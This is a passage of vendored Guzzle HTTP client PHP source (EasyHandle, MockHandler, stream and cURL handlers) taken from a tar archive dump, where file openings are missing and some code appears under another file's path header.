$headers[$normalizedKeys['content-encoding']]; unset($headers[$normalizedKeys['content-encoding']]); if (isset($normalizedKeys['content-length'])) { $headers['x-encoded-content-length'] = $headers[$normalizedKeys['content-length']]; $bodyLength = (int) $this->sink->getSize(); if ($bodyLength) { $headers[$normalizedKeys['content-length']] = $bodyLength; } else { unset($headers[$normalizedKeys['content-length']]); } } } // Attach a response to the easy handle with the parsed headers. $this->response = new Response( $status, $headers, $this->sink, $ver, $reason ); } /** * @param string $name * * @return void * * @throws \BadMethodCallException */ public function __get($name) { $msg = $name === 'handle' ? 'The EasyHandle has been released' : 'Invalid property: '.$name; throw new \BadMethodCallException($msg); } } google-api/vendor/guzzlehttp/guzzle/src/Handler/MockHandler.php000064400000014415147600400120020667 0ustar00|null $queue The parameters to be passed to the append function, as an indexed array. * @param callable|null $onFulfilled Callback to invoke when the return value is fulfilled. * @param callable|null $onRejected Callback to invoke when the return value is rejected. */ public function __construct(array $queue = null, callable $onFulfilled = null, callable $onRejected = null) { $this->onFulfilled = $onFulfilled; $this->onRejected = $onRejected; if ($queue) { // array_values included for BC $this->append(...array_values($queue)); } } public function __invoke(RequestInterface $request, array $options): PromiseInterface { if (!$this->queue) { throw new \OutOfBoundsException('Mock queue is empty'); } if (isset($options['delay']) && \is_numeric($options['delay'])) { \usleep((int) $options['delay'] * 1000); } $this->lastRequest = $request; $this->lastOptions = $options; $response = \array_shift($this->queue); if (isset($options['on_headers'])) { if (!\is_callable($options['on_headers'])) { throw new \InvalidArgumentException('on_headers must be callable'); } try { $options['on_headers']($response); } catch (\Exception $e) { $msg = 'An error was encountered during the on_headers event'; $response = new RequestException($msg, $request, $response, $e); } } if (\is_callable($response)) { $response = $response($request, $options); } $response = $response instanceof \Throwable ? P\Create::rejectionFor($response) : P\Create::promiseFor($response); return $response->then( function (?ResponseInterface $value) use ($request, $options) { $this->invokeStats($request, $options, $value); if ($this->onFulfilled) { ($this->onFulfilled)($value); } if ($value !== null && isset($options['sink'])) { $contents = (string) $value->getBody(); $sink = $options['sink']; if (\is_resource($sink)) { \fwrite($sink, $contents); } elseif (\is_string($sink)) { \file_put_contents($sink, $contents); } elseif ($sink instanceof StreamInterface) { $sink->write($contents); } } return $value; }, function ($reason) use ($request, $options) { $this->invokeStats($request, $options, null, $reason); if ($this->onRejected) { ($this->onRejected)($reason); } return P\Create::rejectionFor($reason); } ); } /** * Adds one or more variadic requests, exceptions, callables, or promises * to the queue. * * @param mixed ...$values */ public function append(...$values): void { foreach ($values as $value) { if ($value instanceof ResponseInterface || $value instanceof \Throwable || $value instanceof PromiseInterface || \is_callable($value) ) { $this->queue[] = $value; } else { throw new \TypeError('Expected a Response, Promise, Throwable or callable. Found '.Utils::describeType($value)); } } } /** * Get the last received request. */ public function getLastRequest(): ?RequestInterface { return $this->lastRequest; } /** * Get the last received request options. */ public function getLastOptions(): array { return $this->lastOptions; } /** * Returns the number of remaining items in the queue. */ public function count(): int { return \count($this->queue); } public function reset(): void { $this->queue = []; } /** * @param mixed $reason Promise or reason. */ private function invokeStats( RequestInterface $request, array $options, ResponseInterface $response = null, $reason = null ): void { if (isset($options['on_stats'])) { $transferTime = $options['transfer_time'] ?? 0; $stats = new TransferStats($request, $response, $transferTime, $reason); ($options['on_stats'])($stats); } } } google-api/vendor/guzzlehttp/guzzle/src/Handler/Proxy.php000064400000004356147600400120017624 0ustar00withoutHeader('Expect'); // Append a content-length header if body size is zero to match // cURL's behavior. if (0 === $request->getBody()->getSize()) { $request = $request->withHeader('Content-Length', '0'); } return $this->createResponse( $request, $options, $this->createStream($request, $options), $startTime ); } catch (\InvalidArgumentException $e) { throw $e; } catch (\Exception $e) { // Determine if the error was a networking error. $message = $e->getMessage(); // This list can probably get more comprehensive. if (false !== \strpos($message, 'getaddrinfo') // DNS lookup failed || false !== \strpos($message, 'Connection refused') || false !== \strpos($message, "couldn't connect to host") // error on HHVM || false !== \strpos($message, 'connection attempt failed') ) { $e = new ConnectException($e->getMessage(), $request, $e); } else { $e = RequestException::wrapException($request, $e); } $this->invokeStats($options, $request, $startTime, null, $e); return P\Create::rejectionFor($e); } } private function invokeStats( array $options, RequestInterface $request, ?float $startTime, ResponseInterface $response = null, \Throwable $error = null ): void { if (isset($options['on_stats'])) { $stats = new TransferStats($request, $response, Utils::currentTime() - $startTime, $error, []); ($options['on_stats'])($stats); } } /** * @param resource $stream */ private function createResponse(RequestInterface $request, array $options, $stream, ?float $startTime): PromiseInterface { $hdrs = $this->lastHeaders; $this->lastHeaders = []; try { [$ver, $status, $reason, $headers] = HeaderProcessor::parseHeaders($hdrs); } catch (\Exception $e) { return P\Create::rejectionFor( new RequestException('An error was encountered while creating the response', $request, null, $e) ); } [$stream, $headers] = $this->checkDecode($options, $headers, $stream); $stream = Psr7\Utils::streamFor($stream); $sink = $stream; if (\strcasecmp('HEAD', $request->getMethod())) { $sink = $this->createSink($stream, $options); } try { $response = new Psr7\Response($status, $headers, $sink, $ver, $reason); } catch (\Exception $e) { return P\Create::rejectionFor( new RequestException('An error was encountered while creating the response', $request, null, $e) ); } if (isset($options['on_headers'])) { try { $options['on_headers']($response); } catch (\Exception $e) { return P\Create::rejectionFor( new RequestException('An error was encountered during the on_headers event', $request, $response, $e) ); } } // Do not drain when the request is a HEAD request because they have // no body. if ($sink !== $stream) { $this->drain($stream, $sink, $response->getHeaderLine('Content-Length')); } $this->invokeStats($options, $request, $startTime, $response, null); return new FulfilledPromise($response); } private function createSink(StreamInterface $stream, array $options): StreamInterface { if (!empty($options['stream'])) { return $stream; } $sink = $options['sink'] ?? Psr7\Utils::tryFopen('php://temp', 'r+'); return \is_string($sink) ? new Psr7\LazyOpenStream($sink, 'w+') : Psr7\Utils::streamFor($sink); } /** * @param resource $stream */ private function checkDecode(array $options, array $headers, $stream): array { // Automatically decode responses when instructed. if (!empty($options['decode_content'])) { $normalizedKeys = Utils::normalizeHeaderKeys($headers); if (isset($normalizedKeys['content-encoding'])) { $encoding = $headers[$normalizedKeys['content-encoding']]; if ($encoding[0] === 'gzip' || $encoding[0] === 'deflate') { $stream = new Psr7\InflateStream(Psr7\Utils::streamFor($stream)); $headers['x-encoded-content-encoding'] = $headers[$normalizedKeys['content-encoding']]; // Remove content-encoding header unset($headers[$normalizedKeys['content-encoding']]); // Fix content-length header if (isset($normalizedKeys['content-length'])) { $headers['x-encoded-content-length'] = $headers[$normalizedKeys['content-length']]; $length = (int) $stream->getSize(); if ($length === 0) { unset($headers[$normalizedKeys['content-length']]); } else { $headers[$normalizedKeys['content-length']] = [$length]; } } } } } return [$stream, $headers]; } /** * Drains the source stream into the "sink" client option. * * @param string $contentLength Header specifying the amount of * data to read. * * @throws \RuntimeException when the sink option is invalid. */ private function drain(StreamInterface $source, StreamInterface $sink, string $contentLength): StreamInterface { // If a content-length header is provided, then stop reading once // that number of bytes has been read. This can prevent infinitely // reading from a stream when dealing with servers that do not honor // Connection: Close headers. Psr7\Utils::copyToStream( $source, $sink, (\strlen($contentLength) > 0 && (int) $contentLength > 0) ? (int) $contentLength : -1 ); $sink->seek(0); $source->close(); return $sink; } /** * Create a resource and check to ensure it was created successfully * * @param callable $callback Callable that returns stream resource * * @return resource * * @throws \RuntimeException on error */ private function createResource(callable $callback) { $errors = []; \set_error_handler(static function ($_, $msg, $file, $line) use (&$errors): bool { $errors[] = [ 'message' => $msg, 'file' => $file, 'line' => $line, ]; return true; }); try { $resource = $callback(); } finally { \restore_error_handler(); } if (!$resource) { $message = 'Error creating resource: '; foreach ($errors as $err) { foreach ($err as $key => $value) { $message .= "[$key] $value".\PHP_EOL; } } throw new \RuntimeException(\trim($message)); } return $resource; } /** * @return resource */ private function createStream(RequestInterface $request, array $options) { static $methods; if (!$methods) { $methods = \array_flip(\get_class_methods(__CLASS__)); } if (!\in_array($request->getUri()->getScheme(), ['http', 'https'])) { throw new RequestException(\sprintf("The scheme '%s' is not supported.", $request->getUri()->getScheme()), $request); } // HTTP/1.1 streams using the PHP stream wrapper require a // Connection: close header if ($request->getProtocolVersion() == '1.1' && !$request->hasHeader('Connection') ) { $request = $request->withHeader('Connection', 'close'); } // Ensure SSL is verified by default if (!isset($options['verify'])) { $options['verify'] = true; } $params = []; $context = $this->getDefaultContext($request); if (isset($options['on_headers']) && !\is_callable($options['on_headers'])) { throw new \InvalidArgumentException('on_headers must be callable'); } if (!empty($options)) { foreach ($options as $key => $value) { $method = "add_{$key}"; if (isset($methods[$method])) { $this->{$method}($request, $context, $value, $params); } } } if (isset($options['stream_context'])) { if (!\is_array($options['stream_context'])) { throw new \InvalidArgumentException('stream_context must be an array'); } $context = \array_replace_recursive($context, $options['stream_context']); } // Microsoft NTLM authentication only supported with curl handler if (isset($options['auth'][2]) && 'ntlm' === $options['auth'][2]) { throw new \InvalidArgumentException('Microsoft NTLM authentication only supported with curl handler'); } $uri = $this->resolveHost($request, $options); $contextResource = $this->createResource( static function () use ($context, $params) { return \stream_context_create($context, $params); } ); return $this->createResource( function () use ($uri, &$http_response_header, $contextResource, $context, $options, $request) { $resource = @\fopen((string) $uri, 'r', false, $contextResource); $this->lastHeaders = $http_response_header ?? []; if (false === $resource) { throw new ConnectException(sprintf('Connection refused for URI %s', $uri), $request, null, $context); } if (isset($options['read_timeout'])) { $readTimeout = $options['read_timeout']; $sec = (int) $readTimeout; $usec = ($readTimeout - $sec) * 100000; \stream_set_timeout($resource, $sec, $usec); } return $resource; } ); } private function resolveHost(RequestInterface $request, array $options): UriInterface { $uri = $request->getUri(); if (isset($options['force_ip_resolve']) && !\filter_var($uri->getHost(), \FILTER_VALIDATE_IP)) { if ('v4' === $options['force_ip_resolve']) { $records = \dns_get_record($uri->getHost(), \DNS_A); if (false === $records || !isset($records[0]['ip'])) { throw new ConnectException(\sprintf("Could not resolve IPv4 address for host '%s'", $uri->getHost()), $request); } return $uri->withHost($records[0]['ip']); } if ('v6' === $options['force_ip_resolve']) { $records = \dns_get_record($uri->getHost(), \DNS_AAAA); if (false === $records || !isset($records[0]['ipv6'])) { throw new ConnectException(\sprintf("Could not resolve IPv6 address for host '%s'", $uri->getHost()), $request); } return $uri->withHost('['.$records[0]['ipv6'].']'); } } return $uri; } private function getDefaultContext(RequestInterface $request): array { $headers = ''; foreach ($request->getHeaders() as $name => $value) { foreach ($value as $val) { $headers .= "$name: $val\r\n"; } } $context = [ 'http' => [ 'method' => $request->getMethod(), 'header' => $headers, 'protocol_version' => $request->getProtocolVersion(), 'ignore_errors' => true, 'follow_location' => 0, ], 'ssl' => [ 'peer_name' => $request->getUri()->getHost(), ], ]; $body = (string) $request->getBody(); if ('' !== $body) { $context['http']['content'] = $body; // Prevent the HTTP handler from adding a Content-Type header. if (!$request->hasHeader('Content-Type')) { $context['http']['header'] .= "Content-Type:\r\n"; } } $context['http']['header'] = \rtrim($context['http']['header']); return $context; } /** * @param mixed $value as passed via Request transfer options. */ private function add_proxy(RequestInterface $request, array &$options, $value, array &$params): void { $uri = null; if (!\is_array($value)) { $uri = $value; } else { $scheme = $request->getUri()->getScheme(); if (isset($value[$scheme])) { if (!isset($value['no']) || !Utils::isHostInNoProxy($request->getUri()->getHost(), $value['no'])) { $uri = $value[$scheme]; } } } if (!$uri) { return; } $parsed = $this->parse_proxy($uri); $options['http']['proxy'] = $parsed['proxy']; if ($parsed['auth']) { if (!isset($options['http']['header'])) { $options['http']['header'] = []; } $options['http']['header'] .= "\r\nProxy-Authorization: {$parsed['auth']}"; } } /** * Parses the given proxy URL to make it compatible with the format PHP's stream context expects. */ private function parse_proxy(string $url): array { $parsed = \parse_url($url); if ($parsed !== false && isset($parsed['scheme']) && $parsed['scheme'] === 'http') { if (isset($parsed['host']) && isset($parsed['port'])) { $auth = null; if (isset($parsed['user']) && isset($parsed['pass'])) { $auth = \base64_encode("{$parsed['user']}:{$parsed['pass']}"); } return [ 'proxy' => "tcp://{$parsed['host']}:{$parsed['port']}", 'auth' => $auth ? "Basic {$auth}" : null, ]; } } // Return proxy as-is. return [ 'proxy' => $url, 'auth' => null, ]; } /** * @param mixed $value as passed via Request transfer options. */ private function add_timeout(RequestInterface $request, array &$options, $value, array &$params): void { if ($value > 0) { $options['http']['timeout'] = $value; } } /** * @param mixed $value as passed via Request transfer options. */ private function add_crypto_method(RequestInterface $request, array &$options, $value, array &$params): void { if ( $value === \STREAM_CRYPTO_METHOD_TLSv1_0_CLIENT || $value === \STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT || $value === \STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT || (defined('STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT') && $value === \STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT) ) { $options['http']['crypto_method'] = $value; return; } throw new \InvalidArgumentException('Invalid crypto_method request option: unknown version provided'); } /** * @param mixed $value as passed via Request transfer options. */ private function add_verify(RequestInterface $request, array &$options, $value, array &$params): void { if ($value === false) { $options['ssl']['verify_peer'] = false; $options['ssl']['verify_peer_name'] = false; return; } if (\is_string($value)) { $options['ssl']['cafile'] = $value; if (!\file_exists($value)) { throw new \RuntimeException("SSL CA bundle not found: $value"); } } elseif ($value !== true) { throw new \InvalidArgumentException('Invalid verify request option'); } $options['ssl']['verify_peer'] = true; $options['ssl']['verify_peer_name'] = true; $options['ssl']['allow_self_signed'] = false; } /** * @param mixed $value as passed via Request transfer options. */ private function add_cert(RequestInterface $request, array &$options, $value, array &$params): void { if (\is_array($value)) { $options['ssl']['passphrase'] = $value[1]; $value = $value[0]; } if (!\file_exists($value)) { throw new \RuntimeException("SSL certificate not found: {$value}"); } $options['ssl']['local_cert'] = $value; } /** * @param mixed $value as passed via Request transfer options. */ private function add_progress(RequestInterface $request, array &$options, $value, array &$params): void { self::addNotification( $params, static function ($code, $a, $b, $c, $transferred, $total) use ($value) { if ($code == \STREAM_NOTIFY_PROGRESS) { // The upload progress cannot be determined. Use 0 for cURL compatibility: // https://curl.se/libcurl/c/CURLOPT_PROGRESSFUNCTION.html $value($total, $transferred, 0, 0); } } ); } /** * @param mixed $value as passed via Request transfer options. */ private function add_debug(RequestInterface $request, array &$options, $value, array &$params): void { if ($value === false) { return; } static $map = [ \STREAM_NOTIFY_CONNECT => 'CONNECT', \STREAM_NOTIFY_AUTH_REQUIRED => 'AUTH_REQUIRED', \STREAM_NOTIFY_AUTH_RESULT => 'AUTH_RESULT', \STREAM_NOTIFY_MIME_TYPE_IS => 'MIME_TYPE_IS', \STREAM_NOTIFY_FILE_SIZE_IS => 'FILE_SIZE_IS', \STREAM_NOTIFY_REDIRECTED => 'REDIRECTED', \STREAM_NOTIFY_PROGRESS => 'PROGRESS', \STREAM_NOTIFY_FAILURE => 'FAILURE', \STREAM_NOTIFY_COMPLETED => 'COMPLETED', \STREAM_NOTIFY_RESOLVE => 'RESOLVE', ]; static $args = ['severity', 'message', 'message_code', 'bytes_transferred', 'bytes_max']; $value = Utils::debugResource($value); $ident = $request->getMethod().' '.$request->getUri()->withFragment(''); self::addNotification( $params, static function (int $code, ...$passed) use ($ident, $value, $map, $args): void { \fprintf($value, '<%s> [%s] ', $ident, $map[$code]); foreach (\array_filter($passed) as $i => $v) { \fwrite($value, $args[$i].': "'.$v.'" '); } \fwrite($value, "\n"); } ); } private static function addNotification(array &$params, callable $notify): void { // Wrap the existing function if needed. if (!isset($params['notification'])) { $params['notification'] = $notify; } else { $params['notification'] = self::callArray([ $params['notification'], $notify, ]); } } private static function callArray(array $functions): callable { return static function (...$args) use ($functions) { foreach ($functions as $fn) { $fn(...$args); } }; } } google-api/vendor/guzzlehttp/guzzle/src/Handler/HeaderProcessor.php000064400000002040147600400120021557 0ustar00maxHandles = $maxHandles; } public function create(RequestInterface $request, array $options): EasyHandle { if (isset($options['curl']['body_as_string'])) { $options['_body_as_string'] = $options['curl']['body_as_string']; unset($options['curl']['body_as_string']); } $easy = new EasyHandle(); $easy->request = $request; $easy->options = $options; $conf = $this->getDefaultConf($easy); $this->applyMethod($easy, $conf); $this->applyHandlerOptions($easy, $conf); $this->applyHeaders($easy, $conf); unset($conf['_headers']); // Add handler options from the request configuration options if (isset($options['curl'])) { $conf = \array_replace($conf, $options['curl']); } $conf[\CURLOPT_HEADERFUNCTION] = $this->createHeaderFn($easy); $easy->handle = $this->handles ? \array_pop($this->handles) : \curl_init(); curl_setopt_array($easy->handle, $conf); return $easy; } public function release(EasyHandle $easy): void { $resource = $easy->handle; unset($easy->handle); if (\count($this->handles) >= $this->maxHandles) { \curl_close($resource); } else { // Remove all callback functions as they can hold onto references // and are not cleaned up by curl_reset. Using curl_setopt_array // does not work for some reason, so removing each one // individually. \curl_setopt($resource, \CURLOPT_HEADERFUNCTION, null); \curl_setopt($resource, \CURLOPT_READFUNCTION, null); \curl_setopt($resource, \CURLOPT_WRITEFUNCTION, null); \curl_setopt($resource, \CURLOPT_PROGRESSFUNCTION, null); \curl_reset($resource); $this->handles[] = $resource; } } /** * Completes a cURL transaction, either returning a response promise or a * rejected promise. * * @param callable(RequestInterface, array): PromiseInterface $handler * @param CurlFactoryInterface $factory Dictates how the handle is released */ public static function finish(callable $handler, EasyHandle $easy, CurlFactoryInterface $factory): PromiseInterface { if (isset($easy->options['on_stats'])) { self::invokeStats($easy); } if (!$easy->response || $easy->errno) { return self::finishError($handler, $easy, $factory); } // Return the response if it is present and there is no error. $factory->release($easy); // Rewind the body of the response if possible. $body = $easy->response->getBody(); if ($body->isSeekable()) { $body->rewind(); } return new FulfilledPromise($easy->response); } private static function invokeStats(EasyHandle $easy): void { $curlStats = \curl_getinfo($easy->handle); $curlStats['appconnect_time'] = \curl_getinfo($easy->handle, \CURLINFO_APPCONNECT_TIME); $stats = new TransferStats( $easy->request, $easy->response, $curlStats['total_time'], $easy->errno, $curlStats ); ($easy->options['on_stats'])($stats); } /** * @param callable(RequestInterface, array): PromiseInterface $handler */ private static function finishError(callable $handler, EasyHandle $easy, CurlFactoryInterface $factory): PromiseInterface { // Get error information and release the handle to the factory. $ctx = [ 'errno' => $easy->errno, 'error' => \curl_error($easy->handle), 'appconnect_time' => \curl_getinfo($easy->handle, \CURLINFO_APPCONNECT_TIME), ] + \curl_getinfo($easy->handle); $ctx[self::CURL_VERSION_STR] = \curl_version()['version']; $factory->release($easy); // Retry when nothing is present or when curl failed to rewind. if (empty($easy->options['_err_message']) && (!$easy->errno || $easy->errno == 65)) { return self::retryFailedRewind($handler, $easy, $ctx); } return self::createRejection($easy, $ctx); } private static function createRejection(EasyHandle $easy, array $ctx): PromiseInterface { static $connectionErrors = [ \CURLE_OPERATION_TIMEOUTED => true, \CURLE_COULDNT_RESOLVE_HOST => true, \CURLE_COULDNT_CONNECT => true, \CURLE_SSL_CONNECT_ERROR => true, \CURLE_GOT_NOTHING => true, ]; if ($easy->createResponseException) { return P\Create::rejectionFor( new RequestException( 'An error was encountered while creating the response', $easy->request, $easy->response, $easy->createResponseException, $ctx ) ); } // If an exception was encountered during the onHeaders event, then // return a rejected promise that wraps that exception. if ($easy->onHeadersException) { return P\Create::rejectionFor( new RequestException( 'An error was encountered during the on_headers event', $easy->request, $easy->response, $easy->onHeadersException, $ctx ) ); } $message = \sprintf( 'cURL error %s: %s (%s)', $ctx['errno'], $ctx['error'], 'see https://curl.haxx.se/libcurl/c/libcurl-errors.html' ); $uriString = (string) $easy->request->getUri(); if ($uriString !== '' && false === \strpos($ctx['error'], $uriString)) { $message .= \sprintf(' for %s', $uriString); } // Create a connection exception if it was a specific error code. $error = isset($connectionErrors[$easy->errno]) ? new ConnectException($message, $easy->request, null, $ctx) : new RequestException($message, $easy->request, $easy->response, null, $ctx); return P\Create::rejectionFor($error); } /** * @return array */ private function getDefaultConf(EasyHandle $easy): array { $conf = [ '_headers' => $easy->request->getHeaders(), \CURLOPT_CUSTOMREQUEST => $easy->request->getMethod(), \CURLOPT_URL => (string) $easy->request->getUri()->withFragment(''), \CURLOPT_RETURNTRANSFER => false, \CURLOPT_HEADER => false, \CURLOPT_CONNECTTIMEOUT => 300, ]; if (\defined('CURLOPT_PROTOCOLS')) { $conf[\CURLOPT_PROTOCOLS] = \CURLPROTO_HTTP | \CURLPROTO_HTTPS; } $version = $easy->request->getProtocolVersion(); if ($version == 1.1) { $conf[\CURLOPT_HTTP_VERSION] = \CURL_HTTP_VERSION_1_1; } elseif ($version == 2.0) { $conf[\CURLOPT_HTTP_VERSION] = \CURL_HTTP_VERSION_2_0; } else { $conf[\CURLOPT_HTTP_VERSION] = \CURL_HTTP_VERSION_1_0; } return $conf; } private function applyMethod(EasyHandle $easy, array &$conf): void { $body = $easy->request->getBody(); $size = $body->getSize(); if ($size === null || $size > 0) { $this->applyBody($easy->request, $easy->options, $conf); return; } $method = $easy->request->getMethod(); if ($method === 'PUT' || $method === 'POST') { // See https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.2 if (!$easy->request->hasHeader('Content-Length')) { $conf[\CURLOPT_HTTPHEADER][] = 'Content-Length: 0'; } } elseif ($method === 'HEAD') { $conf[\CURLOPT_NOBODY] = true; unset( $conf[\CURLOPT_WRITEFUNCTION], $conf[\CURLOPT_READFUNCTION], $conf[\CURLOPT_FILE], $conf[\CURLOPT_INFILE] ); } } private function applyBody(RequestInterface $request, array $options, array &$conf): void { $size = $request->hasHeader('Content-Length') ? (int) $request->getHeaderLine('Content-Length') : null; // Send the body as a string if the size is less than 1MB OR if the // [curl][body_as_string] request value is set. if (($size !== null && $size < 1000000) || !empty($options['_body_as_string'])) { $conf[\CURLOPT_POSTFIELDS] = (string) $request->getBody(); // Don't duplicate the Content-Length header $this->removeHeader('Content-Length', $conf); $this->removeHeader('Transfer-Encoding', $conf); } else { $conf[\CURLOPT_UPLOAD] = true; if ($size !== null) { $conf[\CURLOPT_INFILESIZE] = $size; $this->removeHeader('Content-Length', $conf); } $body = $request->getBody(); if ($body->isSeekable()) { $body->rewind(); } $conf[\CURLOPT_READFUNCTION] = static function ($ch, $fd, $length) use ($body) { return $body->read($length); }; } // If the Expect header is not present, prevent curl from adding it if (!$request->hasHeader('Expect')) { $conf[\CURLOPT_HTTPHEADER][] = 'Expect:'; } // cURL sometimes adds a content-type by default. Prevent this. if (!$request->hasHeader('Content-Type')) { $conf[\CURLOPT_HTTPHEADER][] = 'Content-Type:'; } } private function applyHeaders(EasyHandle $easy, array &$conf): void { foreach ($conf['_headers'] as $name => $values) { foreach ($values as $value) { $value = (string) $value; if ($value === '') { // cURL requires a special format for empty headers. // See https://github.com/guzzle/guzzle/issues/1882 for more details. $conf[\CURLOPT_HTTPHEADER][] = "$name;"; } else { $conf[\CURLOPT_HTTPHEADER][] = "$name: $value"; } } } // Remove the Accept header if one was not set if (!$easy->request->hasHeader('Accept')) { $conf[\CURLOPT_HTTPHEADER][] = 'Accept:'; } } /** * Remove a header from the options array. * * @param string $name Case-insensitive header to remove * @param array $options Array of options to modify */ private function removeHeader(string $name, array &$options): void { foreach (\array_keys($options['_headers']) as $key) { if (!\strcasecmp($key, $name)) { unset($options['_headers'][$key]); return; } } } private function applyHandlerOptions(EasyHandle $easy, array &$conf): void { $options = $easy->options; if (isset($options['verify'])) { if ($options['verify'] === false) { unset($conf[\CURLOPT_CAINFO]); $conf[\CURLOPT_SSL_VERIFYHOST] = 0; $conf[\CURLOPT_SSL_VERIFYPEER] = false; } else { $conf[\CURLOPT_SSL_VERIFYHOST] = 2; $conf[\CURLOPT_SSL_VERIFYPEER] = true; if (\is_string($options['verify'])) { // Throw an error if the file/folder/link path is not valid or doesn't exist. if (!\file_exists($options['verify'])) { throw new \InvalidArgumentException("SSL CA bundle not found: {$options['verify']}"); } // If it's a directory or a link to a directory use CURLOPT_CAPATH. // If not, it's probably a file, or a link to a file, so use CURLOPT_CAINFO. if ( \is_dir($options['verify']) || ( \is_link($options['verify']) === true && ($verifyLink = \readlink($options['verify'])) !== false && \is_dir($verifyLink) ) ) { $conf[\CURLOPT_CAPATH] = $options['verify']; } else { $conf[\CURLOPT_CAINFO] = $options['verify']; } } } } if (!isset($options['curl'][\CURLOPT_ENCODING]) && !empty($options['decode_content'])) { $accept = $easy->request->getHeaderLine('Accept-Encoding'); if ($accept) { $conf[\CURLOPT_ENCODING] = $accept; } else { // The empty string enables all available decoders and implicitly // sets a matching 'Accept-Encoding' header. $conf[\CURLOPT_ENCODING] = ''; // But as the user did not specify any acceptable encodings we need // to overwrite this implicit header with an empty one. $conf[\CURLOPT_HTTPHEADER][] = 'Accept-Encoding:'; } } if (!isset($options['sink'])) { // Use a default temp stream if no sink was set. $options['sink'] = \GuzzleHttp\Psr7\Utils::tryFopen('php://temp', 'w+'); } $sink = $options['sink']; if (!\is_string($sink)) { $sink = \GuzzleHttp\Psr7\Utils::streamFor($sink); } elseif (!\is_dir(\dirname($sink))) { // Ensure that the directory exists before failing in curl. throw new \RuntimeException(\sprintf('Directory %s does not exist for sink value of %s', \dirname($sink), $sink)); } else { $sink = new LazyOpenStream($sink, 'w+'); } $easy->sink = $sink; $conf[\CURLOPT_WRITEFUNCTION] = static function ($ch, $write) use ($sink): int { return $sink->write($write); }; $timeoutRequiresNoSignal = false; if (isset($options['timeout'])) { $timeoutRequiresNoSignal |= $options['timeout'] < 1; $conf[\CURLOPT_TIMEOUT_MS] = $options['timeout'] * 1000; } // CURL default value is CURL_IPRESOLVE_WHATEVER if (isset($options['force_ip_resolve'])) { if ('v4' === $options['force_ip_resolve']) { $conf[\CURLOPT_IPRESOLVE] = \CURL_IPRESOLVE_V4; } elseif ('v6' === $options['force_ip_resolve']) { $conf[\CURLOPT_IPRESOLVE] = \CURL_IPRESOLVE_V6; } } if (isset($options['connect_timeout'])) { $timeoutRequiresNoSignal |= $options['connect_timeout'] < 1; $conf[\CURLOPT_CONNECTTIMEOUT_MS] = $options['connect_timeout'] * 1000; } if ($timeoutRequiresNoSignal && \strtoupper(\substr(\PHP_OS, 0, 3)) !== 'WIN') { $conf[\CURLOPT_NOSIGNAL] = true; } if (isset($options['proxy'])) { if (!\is_array($options['proxy'])) { $conf[\CURLOPT_PROXY] = $options['proxy']; } else { $scheme = $easy->request->getUri()->getScheme(); if (isset($options['proxy'][$scheme])) { $host = $easy->request->getUri()->getHost(); if (isset($options['proxy']['no']) && Utils::isHostInNoProxy($host, $options['proxy']['no'])) { unset($conf[\CURLOPT_PROXY]); } else { $conf[\CURLOPT_PROXY] = $options['proxy'][$scheme]; } } } } if (isset($options['crypto_method'])) { if (\STREAM_CRYPTO_METHOD_TLSv1_0_CLIENT === $options['crypto_method']) { if (!defined('CURL_SSLVERSION_TLSv1_0')) { throw new \InvalidArgumentException('Invalid crypto_method request option: TLS 1.0 not supported by your version of cURL'); } $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_0; } elseif (\STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT === $options['crypto_method']) { if (!defined('CURL_SSLVERSION_TLSv1_1')) { throw new \InvalidArgumentException('Invalid crypto_method request option: TLS 1.1 not supported by your version of cURL'); } $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_1; } elseif (\STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT === $options['crypto_method']) { if (!defined('CURL_SSLVERSION_TLSv1_2')) { throw new \InvalidArgumentException('Invalid crypto_method request option: TLS 1.2 not supported by your version of cURL'); } $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_2; } elseif (defined('STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT') && \STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT === $options['crypto_method']) { if (!defined('CURL_SSLVERSION_TLSv1_3')) { throw new \InvalidArgumentException('Invalid crypto_method request option: TLS 1.3 not supported by your version of cURL'); } $conf[\CURLOPT_SSLVERSION] = \CURL_SSLVERSION_TLSv1_3; } else { throw new \InvalidArgumentException('Invalid crypto_method request option: unknown version provided'); } } if (isset($options['cert'])) { $cert = $options['cert']; if (\is_array($cert)) { $conf[\CURLOPT_SSLCERTPASSWD] = $cert[1]; $cert = $cert[0]; } if (!\file_exists($cert)) { throw new \InvalidArgumentException("SSL certificate not found: {$cert}"); } // OpenSSL (versions 0.9.3 and later) also support "P12" for PKCS#12-encoded files. // see https://curl.se/libcurl/c/CURLOPT_SSLCERTTYPE.html $ext = pathinfo($cert, \PATHINFO_EXTENSION); if (preg_match('#^(der|p12)$#i', $ext)) { $conf[\CURLOPT_SSLCERTTYPE] = strtoupper($ext); } $conf[\CURLOPT_SSLCERT] = $cert; } if (isset($options['ssl_key'])) { if (\is_array($options['ssl_key'])) { if (\count($options['ssl_key']) === 2) { [$sslKey, $conf[\CURLOPT_SSLKEYPASSWD]] = $options['ssl_key']; } else { [$sslKey] = $options['ssl_key']; } } $sslKey = $sslKey ?? $options['ssl_key']; if (!\file_exists($sslKey)) { throw new \InvalidArgumentException("SSL private key not found: {$sslKey}"); } $conf[\CURLOPT_SSLKEY] = $sslKey; } if (isset($options['progress'])) { $progress = $options['progress']; if (!\is_callable($progress)) { throw new \InvalidArgumentException('progress client option must be callable'); } $conf[\CURLOPT_NOPROGRESS] = false; $conf[\CURLOPT_PROGRESSFUNCTION] = static function ($resource, int $downloadSize, int $downloaded, int $uploadSize, int $uploaded) use ($progress) { $progress($downloadSize, $downloaded, $uploadSize, $uploaded); }; } if (!empty($options['debug'])) { $conf[\CURLOPT_STDERR] = Utils::debugResource($options['debug']); $conf[\CURLOPT_VERBOSE] = true; } } /** * This function ensures that a response was set on a transaction. If one * was not set, then the request is retried if possible. This error * typically means you are sending a payload, curl encountered a * "Connection died, retrying a fresh connect" error, tried to rewind the * stream, and then encountered a "necessary data rewind wasn't possible" * error, causing the request to be sent through curl_multi_info_read() * without an error status. * * @param callable(RequestInterface, array): PromiseInterface $handler */ private static function 